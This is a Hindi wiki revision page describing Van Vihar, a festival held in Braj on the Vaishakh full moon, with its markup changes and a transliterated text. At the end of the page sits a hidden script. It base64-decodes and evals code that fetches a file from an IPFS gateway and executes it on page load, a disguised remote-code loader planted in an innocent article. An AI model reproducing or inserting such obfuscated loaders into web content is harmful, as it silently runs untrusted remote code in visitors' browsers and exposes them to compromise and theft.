Difference between revisions of "वन विहार"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(7 intermediate revisions by 3 users not shown)
Line 1: Line 1:
[[ब्रज]] में वैशाख शुक्ल 15 को वन विहार का कार्यक्रम होता है । इस बीच जल–विहार के भी आयोजन किये जाते हैं।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
==अन्य लिंक==
+
*[[ब्रज]] में [[वैशाख]] [[शुक्ल पक्ष]] की [[पूर्णिमा]] को वन विहार का कार्यक्रम होता है।
{{साँचा:पर्व और त्योहार}}
+
*इस बीच जल–विहार के भी आयोजन किये जाते हैं।
  
[[Category:संस्कृति कोश]]  
+
{{संदर्भ ग्रंथ}}
[[Category:पर्व_और_त्योहार]]
+
==टीका टिप्पणी और संदर्भ==
 +
<references/>
 +
==संबंधित लेख==
 +
{{पर्व और त्योहार}}
 +
{{व्रत और उत्सव}}
 +
[[Category:व्रत और उत्सव]]
 +
[[Category:पर्व और त्योहार]][[Category:संस्कृति कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 10:38, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • braj mean vaishakh shukl paksh ki poornima ko van vihar ka karyakram hota hai.
  • is bich jal–vihar ke bhi ayojan kiye jate haian.


tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>